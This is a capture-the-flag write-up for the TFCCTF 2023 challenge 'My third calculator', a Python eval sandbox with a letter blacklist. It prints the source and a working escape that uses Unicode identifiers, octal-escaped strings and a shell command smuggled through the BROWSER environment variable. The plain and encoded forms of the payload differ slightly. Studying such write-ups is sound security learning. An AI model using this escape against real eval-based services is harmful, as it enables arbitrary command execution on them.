TFCCTF 2023 – My third calculator
Author: Lumy
My third calculator (482 points, 14 solves)
I learned a few things from the last ones
Source code
import sys
print("This is a safe calculator")
inp = input("Formula: ")
sys.stdin.close()
# The filter only inspects the raw input text; anything Python decodes or
# normalizes later (string escapes, non-ASCII identifiers) is not seen here.
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
if any(x in inp for x in blacklist):
    print("Nice try")
    exit()
# Restricted builtins, but __import__ and setattr are still reachable.
fns = {
    "__builtins__": {"setattr": setattr, "__import__": __import__, "chr": chr}
}
print(eval(inp, fns, fns))
Solution
To get past the letter filter, we can write identifiers with Unicode characters that Python normalizes to their ASCII equivalents (identifiers are NFKC-normalized at parse time, so 𝑖𝑚𝑝𝑜𝑟𝑡 becomes import), and write string contents with octal escapes, which are only decoded after the blacklist check has run, as below:
Website for string to Unicode encoding: qaz.wtf/u/convert.cgi
Website for string to octal encoding: onlinestringtools.com/convert-string-to-octal
Inspiration: lebr0nli.github.io/blog/security/idek-CTF-2022/#intended-solution
Here is the plain, unencoded form of the payload used:
__import__('antigravity',setattr(__import__('os'),'environ',dict(BROWSER='ls" #%s')))
Here is the same payload using Unicode identifiers and octal escapes to bypass the blacklist:
__𝑖𝑚𝑝𝑜𝑟𝑡__('\141\156\164\151\147\162\141\166\151\164\171',𝑠𝑒𝑡𝑎𝑡𝑡𝑟(__𝑖𝑚𝑝𝑜𝑟𝑡__('\157\163'),'\145\156\166\151\162\157\156',{"\102\122\117\127\123\105\122":'\57\142\151\156\57\163\150\40\55\143\40\42\57\142\151\156\57\154\163\42\40\43\45\163'}))